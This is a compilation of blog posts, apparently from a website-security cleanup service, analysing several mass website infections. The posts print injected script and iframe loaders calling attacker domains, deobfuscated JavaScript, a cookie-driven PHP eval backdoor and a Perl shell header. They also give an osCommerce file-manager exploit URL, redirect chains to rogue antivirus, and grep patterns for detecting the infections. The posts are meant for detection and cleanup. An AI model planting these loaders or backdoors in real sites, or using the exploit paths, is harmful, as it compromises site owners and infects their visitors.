(opening script tag) src="hxxp:// riotassistance.ru /Website.js">(closing script tag)


Note: We’ve also seen this same this but with nuttypiano replacing riotassistance.

Sometimes the last part: Website.js is something else:

Linux.js
Megabyte.js

and a few others. The common pattern here is obviously the riotassistance.ru domain and the last part of the URL has an upper-case first letter and is usually some random, but familiar word.

The other identifier is the seemingly useless string immediately following the malscript. In the example above it’s the:

Keep in mind that this will be different for each website, at least from what we’ve seen so far.

This malscript and it’s associated string has been found in index files and files that start with the word main, or in the footer.php file on WordPress sites. The footer.php that will be infected is usually in the theme folder for your site. So if you’re using the default theme, it will be the footer.php file in the theme/default folder on your site.

This same infection has been found in .js files as a document.write at the bottom of the .js file, such as this:

Time to dig a little deeper…

We find that this domain is registered:

domain: RIOTASSISTANCE.RU
nserver: ns1.getyourdns.com.
nserver: ns2.getyourdns.com.
nserver: ns3.getyourdns.com.
nserver: ns4.getyourdns.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8482 735000
e-mail: angles@fastermail.ru
registrar: NAUNET-REG-RIPN

According to abuse.ch, this registrar has 126 sites that associated to Zeus:

We also find that the above listed email address is only registered on 4 other domains.

As far as cleaning this goes, obviously remove the malscript from your pages or replace the pages with known good backups.

From what we’ve found so far, this website infection happens via stolen FTP credentials. These FTP credentials are stolen by a virus/trojan on a PC that’s been used to FTP files to the infected website.

First, change all FTP passwords – immediately.

Second, run a full virus scan on all PCs used to FTP files to the infected website. This includes developers, authors, etc.

Third, if your site has been listed as suspicious by Google, request a review from the Google Webmaster Tools.

Post here if you have questions or send me an email if you’d like further help in cleaning this up.

Thank you.

What we’re seeing is a malscript inserted either immediately before the legitimate code in certain .js (javascript) files or inserted in html and php files. If it’s in a .js file, you have to be careful because it appears to be part of the entire javascript code. There’s no spaces or line breaks between the malicious code and the legitimate code.

In .html and .php files we’ve usually seen it enclosed by ‘ads’ tags and script tags.

We’ve seen two variations of the malicious code:

The first one starts with:

var st1 = ;this.b=this.M="";this.A="";this.w=false;""...

and ends with:

var gr0=0;

The second starts with:
var st1 = 0;document. write( unescape('%3C%73...

and ends with:

gr0=0;

We’ll examine each one here to let you know what they’re doing.

The first one deobfuscates to this:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.",
"lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.",
"rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+
escape("holycookie")+";expires="+dt.toGMTString()+";path=/";
document. write ('(script tag) src=" hxxp: // '+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

When looking at this code, you’ll see that is uses a variety of user-agent strings:

• yahoo
• search
• msnbot
• yandex
• googlebot
• bing
• ask

Then creates an array of domains:

• myads.name
• adsnet.biz
• toolbarcom.org
• mybar.us
• freead.name

and then creates an array of prefixes:

• axe.
• box.
• cox.
• dex.
• fax.
• fix.
• fox.
• gox.
• hex.
• kex.
• lax.
• lex.
• lox.
• lux.
• max.
• mix.
• nix.
• oxo.
• oxy.
• pax.
• pix.
• pox.
• pyx.
• rax.
• rex.
• sax.
• sex.
• six.
• sox.
• tax.
• tux.
• vex.
• vox.
• wax.
• xis.
• zax.

When you consider the number of possible combinations of domains and subdomains, this becomes quite clear the hackers were looking to hide their locations.

The final part of the code puts it all together and adds a little more to the URL:

document. write(' (script tag) src="hxxp : //'+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

adding the ‘/system/caption.js’ to the end of whatever domain string it’s built.

So a typical string after this first code is decoded might look like:

(script tag) type="text/javascript" src="hxxp: //mix.freead.name/system/caption.js">
(script tag)

The second obfuscated string from above, uses the same basic methodology but uses these domains:

• edisonsnightclub.com
• gaindirectory.org
• ideacoreportal.com
• karenegren.com

and appends one of these strings to the front:

• aqua.
• azure.
• black.
• blue.
• brown.
• chocolate.
• coral.
• cyan.
• darkred.
• fuchsia.
• gold.
• gray.
• green.
• indigo.
• ivory.
• khaki.
• lime.
• magenta.
• maroon.
• navy.
• olive.
• orange.
• pink.
• plum.
• purple.
• red.
• silver.
• snow.
• violet.
• white.
• yellow.

This malscript creates a document.write string that uses one of the above prefixes, one of the above domains and adds ‘/data/mootools.js’ to the end to complete the malscript.

If you’re looking for this malscript in your website, please make sure you grab the entire line all the way to ‘var gr0=0;’ (without the quotes) and nothing more. Otherwise, your legitimate code won’t function properly and you’ll have to restore from backup. Which, may not be a bad thing – unless, of course, you don’t have a good backup.

We’re still investigating how this infection starts. At first we thought it was WordPress based sites only. Then we realized that it was also infecting non-Wordpress sites. It might be the old compromised FTP credentials, but we haven’t been able to gather all our data yet. When we do, we’ll post an update here.

We’re also going to post about the backdoors we’ve found and you can search your site for them as well.

Until then, if you’re infected with this or if Google shows any of these domains in your Safe Browsing Diagnostic report (http://www.google.com/safebrowsing/diagnostic?site=), and you’d like us to clean it for you, please send me an email at traef@wewatchyourwebsite.com

Thank you.

(spaces added so it doesn’t set an alarm with your anti-virus program).

As of right now the following sites don’t recognize vancouvererrorsonfile.com as being malicious:

• Google
• Norton
• rfc_ignorant
• malc0de

However, McAfee’s SiteAdvisor and hpHosts do recognize it as being malicious.

At first it appeared that it was specific to one or two hosting providers, however as the infection carried on, we found it on at least 12 different hosting provider’s networks.

Looking at the server where this site is hosted, reveals other domains that have been used in various malscripts as well:

• dottasink.net
• nowisisdudescars.com
• onlineisdudescars.com

and a few others.

These domains are all registered by the same person: hilarykneber@yahoo.com. This person is the contact person on whois records for 337 domains.

The name servers for vancouvererrorsonfile.com are:

• ns1.masterhostingit.ru
• ns2.masterhostingit.ru

Our service contiues to see these infections and clean them, even though these domains are not yet registered within Google’s Safe Browsing malware list. They have been submitted.

If you are infected with this, you can contact me at traef@wewatchyourwebsite.com and we will clean it for you.

If you have any other information to submit, please feel free to post comments.

Thank you.

nutcountry.ru:8080/index.php
parkperson.ru:8080/index.php

A little searching found that approximately 25,000 web pages have the nutcountry.ru:8080/index.php iframe and another 516 web pages reference parkperson.ru:8080/index.php iframe.

What’s interesting is that none of the websites listed in the Google search for either of these two iframes, are listed with “this site may harm your computer” label.

We checked the Google Safe Browsing Diagnostic for nutcountry.ru and it shows:

It appears that Google just listed nutcountry.ru on 8-03-2010 which would explain why the web pages listed in a Google search aren’t showing the warning, “this site may harm your computer”.

And for parkperson.ru we found this:

parkperson.ru Google Safe Browsing Diagnostic page

Shows that as of 8-04-2010, Google has not found this site to be harmful or suspicious.

We attempted to download the files from parkperson.ru, or watch what infection might occur if visited and found that the domain does not exist and neither does nutcountry.ru.

What does all this mean?

It means, that over 25,000 websites were infected, but with an iframe that is harmless because the URL inside the iframe doesn’t go anywhere.

The other interesting aspect of this infection is that all the web pages appear to be ASP code (.asp or .aspx). Based on the location of the harmless iframes, it appears to be another ASPROX infection.

If it is ASPROX, you’ll probably see the iframe in your SQL database. Based on the location of where the iframe appears in the web pages, it’s not a simple iframe injection. The iframe is actually buried in your SQL database. This will make it more difficult to remove. You should consult the services of a database administrator or a security company that knows SQL (yes we do!).

The next thing will be to determine how the code was inserted. This type of infection is referred to SQL injection. This happens when the input from a form or dynamically generated web page isn’t properly sanitized. If there’s a code plugin you’re using, or utilizing some standard software package in your .ASP code, please check for security updates. If you’ve had a programmer create something for you, contact them and have them check over all the code they created for you. Some where on your site you have a SQL injection vulnerability and it needs to be closed.

As stated, this time, the domains included in the iframe don’t exist. However, the next time, your visitors could get infected and your site could be blacklisted by Google and many other services.

If you need assistance with this, please send me an email at traef@wewatchyourwebsite.com.

If you have other information about this infection, please post it as a comment.

Thank you.

The infection usually included some randomly named folder with a list of files in them. Some of the folder names we’ve seen include:

• catalog
• feeds
• image
• scripts
• items
• rss
• inventory
• visual

The names are common, but are randomly selected by the hacker infecting the website.

Inside the folder are various files, some .html some .php – all no good.

There is usually at least one file that starts with:

set_time_limit(9999999);

This file actually looks for files with one malscript already injected and replaces it with a newer malscript.

For instance, some of them look for:

hxxp://nt002.cn/E/J.JS

and replace it with:

hxxp://nt02.co.in/3

It appears to place these malscripts immediately after the closing body tag.

Frequently we’ve also found various backdoors (shell script) files.

These backdoors look for any .conf files (configuration files) especially from:

• httpd.conf
• vhosts.conf
• proftpd.conf
• psybnc.conf
• my.conf
• all .conf files
• all. .pwd files
• all .sql files
• all .htpasswd files

Armed with this information, the attacker now has complete control over the website.

How to prevent this?

We’ve found a number of exploits available. One of them is a file disclosure vulnerability which means that the attacker can view files on the website.

One of the URLs follows this scheme:

hxxp>//[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/include/configure.php

This particular URL would show the attacker the configure.php file. There is no patch, that we know of yet, that prevents this attack. The best advice we’ve seen is to rename the admin folder something obscure so the hackers can’t just scan your site with this URL and find the file_manager.php file.

Other exploits we’ve seen use the same basic URL but the action variable is set as follows:

admin/file_manager.php/login.php?action=save

Then a URL to a remote site that stores a backdoor shell script. This backdoor then gets saved to the website. All a hacker has to do is to access the URL:

hxxp://[site]/osCSS/[name of shell script backdoor].php

and they have remote access to the site.

Again, if the admin folder is renamed to something obscure, this attack won’t work. This type of protection is aptly named, “security by obscurity” because all you’re doing is hiding the folder from the attacker, but until an official patch is released, this seems to be the best advice.

If you’ve been attacked by this and have some further information, please post a comment or email me at: traef@wewatchyourwebsite.com

If you need help in cleaning this up and checking for all backdoors on your site, please contact me directly at: traef@wewatchyourwebsite.com

<SCR IPT (space added)>
           function addCookie(name, value, hours)
           {
                 var date = new Date();
                date.setTime(date.getTime()+(hours*3600000));
                var expires ”; expires=”+date.toGMTString();
               document.cookie = name+”=”+value+expires+”; “;
          }

document.write(‘<iframe frameborder=”0″ onload=\’ if (!this.src){
this.src=”http://grepad.com/in.cgi?3″; this.height=0; this.width=0;} \’></iframe>’);
addCookie(“cook”, “1″, 24);
</SCR IPT (space added)>

According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml ”Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server which then infects the websites it has legitimate access to. I see no mention of that possibility. Being that this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection, possible, but highly unlikely.

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

 It could have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

 Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

Which deobfuscates to:

if(isset($COOKIE[“PHPSESSIID”])){eval(base64_decode($COOKIE[“PHPSESSIID”]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl
use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");
$P = "Lf'njItkk";
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 120;
$ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>function t()…

What’s interesting about this malscript is that it uses the ‘ob_start’ function to run it’s code. ob_start is used by many WordPress sites, software galleries and other software and plugins for a large variety of websites.

This clearly shows how clever the hackers are. They’re actually using valid functions found on many websites to run their malscripts. Also by “hiding” their malscript as something that uses the words “security_update” they hope that people will overlook their code and move on to other harmful looking code instead.

What can you do if you find this on your website?

Again, this type of attack is the result of a virus that steals the FTP passwords from a PC, sends them to as server which then modifies the files on the website and adds the mailcheck.php and or the chat.pl files so they can re-infect the website after the owner has cleaned the site and changed the FTP passwords.

I recommend using WS_FTP by Ipswitch because this program does not save the stored passwords in plain text. They are encrypted which means the hackers have to do more work in order to use them. It’s not that they aren’t “hackable”, it’s just that the hackers have so many other PCs and websites that are easily hacked that right now, they probably won’t spend the time or effort in cracking the encryption.

You can also check to see if your hosting provider allows you to use SFTP instead of FTP. SFTP is encrypted traffic so a hacker’s virus can’t easily sniff the traffic and see the plain text username and password.

If you have any comments about this information or have a specific instance of a similar infection, please post your comments below.

Thank you.

Many other domains are used as well such as:

• superbblender.ru
• thesuperpager.ru
• superroadmap.ru
• supersupermall.ru
• theblendertv.ru
• theblendertutorial.ru
• excellentblender.ru
• thechocolateweb.ru
• whosaleonline.ru
• worldmusicmagazine.ru
• thelaceweb.ru
• webdesktopnet.ru
• sugaryhome.ru
• homesaleplus.ru
• worldmusicmagazine.ru
• greatwebradio.ru
• avattop.ru
• recentmexico.ru
• cobalttrueblue.ru
• webnetenglish.ru
• newusaguide.ru
• livesitedesign.ru
• sitemape.ru
• samuest.ru
• pokesack.ru
• royalbling.ru
• retireterrify.ru
• thesuperexchange.ru
• snoreflash.ru
• royalbling.ru
• forredtag.ru
• newvillagefresh.ru
• hotnewgirl.ru
• yoursuperpool.ru
• buytheblender.ru

The infectious code we found was at the bottom of index.php files obviously with the <script></script> tags and generally the same code was found at the bottom of various .js (javascript) files without the script tags.

In the obfuscated code there’s usually a number of strings that look like:

if (a!=” && a=’b'){a=null}

There are of course variances to this. The variable ‘a’ can be any letter or even an underscore “_” and may consist of two letters either upper or lowercase.  The variable ‘b’ can be any letter or underscore and can actually be one or two characters and may or may not be uppercase. Other than that, they’re exactly the same.

This format will be found in the malscript in a number of places but obviously with different variables.

The string of characters that all this code works on can be in hex format, for instance:

var I=”\x68\x74\x74\x70\x3a\x2f\x2f…” (which is actually “http://”)

or it might be something like:

var M=”hOtFtOp:O/O/…” (which, when you remove the uppercase characters is actually “http://”)

In the obfuscated malscript there is also a number of variable declarations. You’ll find things like:

• var vM=new Array()
• var j=new String() (sometimes with a value inside the parenthesis)
• var Z=window
• var K=new Date()
• var G=new Regexp(…)
• var QF=document

When I see a variable declaration like: var Z=window or var QF=document, I know that somewhere in the malscript I’ll see something like: z.location or QF.write. This is a common obfuscation technique of the hackers.

In all the cases we’ve worked on with this type of infection, it’s been the result of a virus that has stolen the FTP passwords from a PC with FTP access to the website.

We’ve written about this before, but here are the steps to follow to prevent this from happening again.

1. Install a new anti-virus program. The reason is that it’s obvious that the current anti-virus software didn’t detect anything. Often times these viruses “learn” how to evade detection from the currently installed anti-virus software. Therefore, something new and different is needed to find and remove it. Many have had good results with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software).
2. Change all FTP passwords. I recommend creating a new FTP account for everyone or for every PC that will be accessing the website. Then be sure that FTP logging is activated. This is important. If your website gets infected again, you can look in the logs to see who has the virus. If there’s a user named john and his username shows up in the logs from somewhere across the world, you can safely assume that it’s his username that’s been compromised.

That’s it. 2 steps. It’s easier to prevent your site from being infected than it is to recover from an addiction.

If you have more domains to add to this or would like to comment, please do so. You can leave a comment below or you can email direct at traef@wewatchyourwebsite.com

Until next time…

The typical infection is a five letter .php file such as:

• juqip.php
• kirqf.php
• wxtrg.php
• mtywo.php
• tijox.php

And other file names. The common denominator here is the five letter file name. From what we’ve seen the file name doesn’t start with a vowel and it appears there is a different file name for each website. If you were to Google tijox.php you’ll only see it on one website.

For each of these sites, there is a folder named “./files”. The reason for the dot before the folder name is to hide it from many programs. For instance in the FTP program I use WS_FTP by Ipswitch, you have to specify that you want to see all listings that begin with a dot. By default, in WS_FTP, this folder won’t even show. The same is true for Linux. You won’t see the folder that begins with a dot.

All the files in the “./files” folder are put there by the hackers. The majority of them are movie reviews, but there’s also .html files in there about the Buffalo Sabres hockey team, various “Lord of War” files, Texas Lottery Pick 3 and various other frequently searched terms.

We have seen a lot of them using search terms that reference “lord of war”, but other search terms used are:

• 3 10 To Yuma Soundtrack
• death of a cheerleader wiki
• tx lottery pick 3
• sabres hockey
• strike force results hershel walker
• strike force nashville presale code
• kesha snl
• strangers on a train movie
• knights templar
• freshman fall imdb
• dazed and confused cast
• strangers on a train patricia highsmith
• luci baines johnson pictures
• bernadette protti pictures
• dan henderson vs jake shields fight video
• kelly pavlik news
• the good shepherd imdb
• acm awards 2010 voting
• doctor who victory of the daleks download
• dazed and confused lyrics
• amstel gold race 2010
• roma airport
• farley granger imdb
• tao las vegas
• mastiff
• josh selby basketball
• king mo vs mark kerr
• pavlik vs martinez undercard
• american bulldog
• kelly pavlik vs miguel espino
• kelly pavlik wiki
• sergio martinez next fight
• joe mather girlfriend
• batman and robin comic
• bernadette protti
• guillain barre syndrome wikipedia
• shake weight reviews does it work
• strikeforce results january 30
• the hitcher movie
• psn code generator
• amanda peterson photos
• elearning
• tea leoni
• patrick dempsey
• unemployment
• and many, many others

However, the real interesting information is in the query string. The query string has the “?” after the .php file name, and then it uses a variety of identifiers. Sometimes it’s a single letter other times we’ve seen words like;

• sell
• in
• post
• off
• do
• topic
• page
• pageid
• go

these are followed by the search term. In the search term the spaces are converted to %20 possibly to further try and obfuscate their work.

We found that the majority of sites with this infection have already been found by Google and labeled, “this site may harm your computer”. Unfortunately not all of them have been flagged yet. I say unfortunately, because it seems as though that’s the way most website owners or webmasters find out that a website has been infected – by Google flagging it and sending an email to the email addresses listed in the Google Webmaster Tools.

If you were to Google, “the hitcher movie”, many listings appear that have the warning this site may harm your computer. Some don’t. Anyone looking to find information about “the hitcher movie” might click on one of the sites that hasn’t been labeled by Google yet and here’s what would happen.

First, inside the “./files” folder, there is typically a file named “b.log”. This file contains the website that these files redirect to when clicked on only from a Google Search Results Page (SERP).

For instance in one investigation the b.log file looked like this:

kqx7ea.xorg.pl|1271657010

Anyone clicking on a Google SERP for this particular website would be directed to:

http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN http://kdsproductions.com/ekctj.php?p=the%20hitcher%20movie

Which then redirects to:

http://www4.nomikals2.com/?p=p52dcWltbV%2FRlsijZFaZp29e2KHObWOXk5ecmmFoZG6a http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN

Which redirects to:

http://www2.scanprotection34p.net

Which wants to install a fake (rogue) anti-virus program on your PC.

What to look for

Look in your root folder for your website. It might be public_html or just html. Look for any .php files that have five letters that look totally random. From what we can tell, they are totally random. Then make sure that your FTP software is showing hidden files and folders. Look for a folder named “files” and see if there aren’t a whole lot of .html files in there that you’re quite certain, you didn’t put there.

What to do

If you do find these instances on any of your websites, remove the ./files folder and the five letter randomly named .php file. There may also be .php files installed in your images folders. Search all files for the string:

eval(base64_decode( followed by a long list of characters. Don’t just delete this file, but examine it. If you need help decoding it, please email at: traef@wewatchyourwebsite.com

In all our cases, we’ve found that the culprit was a virus on a PC with FTP access to the infected website. We’ve seen the FTP logs and we’ve identified the IP addresses that some of these files came from.

As with many website infections, the first step is change all FTP passwords and do not save them on any PC – yet.

Then obviously remove all the files identified above.

Next, install a different anti-virus program on your PC. The reason is that these viruses and trojans know how to evade detection of the anti-virus program that’s already been installed when the virus first infected the PC. In order to find and remove the viruses you have to install a different anti-virus program.

Many have had good success with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software). If you’re already using one of these, then try one of the other two – it has to be different.

Once you’ve found and removed the virus or trojan, you can then use your FTP program with the new passwords and feel safe.

The last thing to do is to Request a Review from your Google Webmaster Tools – if your site has tagged with the warning this site may harm your computer.

All of our clients prevented this warning by our monitoring service. While we couldn’t prevent their PCs from getting infected, we could detect when their websites changed. We immediately removed the files and alerted them to take the above steps to clean their PCs. Their websites were never blacklisted by Google because of our automated cleaning process.

If you’d like to be protected, please send me an email: traef@wewatchyourwebsite.som

If you have any comments, please feel free to register and let me know your thoughts or experience with this type of infection.

iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '>/iframe

In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.

We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.

It turn out the result of these infections has been stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com and we can see the IP addresses of where the infection is coming from.

To clean this, first change all FTP passwords.

Second, you’ll have to download your entire site onto your PC or Mac. Then use grepWin and use this as the search string:

iframe/s*frameborder=\"0\" onload=\' if \(\!this\.src\)/s*\{/s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;/s*\} \'><\/iframe

For the replacement string in the field "Replace with:", leave that field blank. Then set the following:

Search case-sensitive: unchecked
Dot matches newline: check
Create backup files: check
Treat files as UTF8: uncheck

Include system items: check
Include hidden items: check
Include subfolders: check

First hit the Search button. Just to see the files in the Search results window. Then hit Replace. This will find and remove the malscript and create a backup of the original file with the malscript.

This will find it all files with that string in there and remove them.

Then copy the cleaned files to your website.

In a few instances, we've been seeing some .php backdoors associated with binglbalt.com infections. These are usual backdoors we see with this code in them:

eval(base64_decode(...

To be sure you don't have that in any of your files use grepWin and this search string:

<\?php/s*eval\(base64_decode\([\'|\"].*?[\'|\"]\)\); \?>

Examine any files that show up in your Search results window for grepWin. If that's the only line in the file, then just delete the file from your website. If that's not the only line in your webpage, then use grepWin to Replace that string with nothing and you should be clean. Often times we've found this string in gifimg.php or mailcheck.php.

If you have any questions or comments, please feel free to post them. Or you can send me an email at: traef@wewatchyourwebsite.com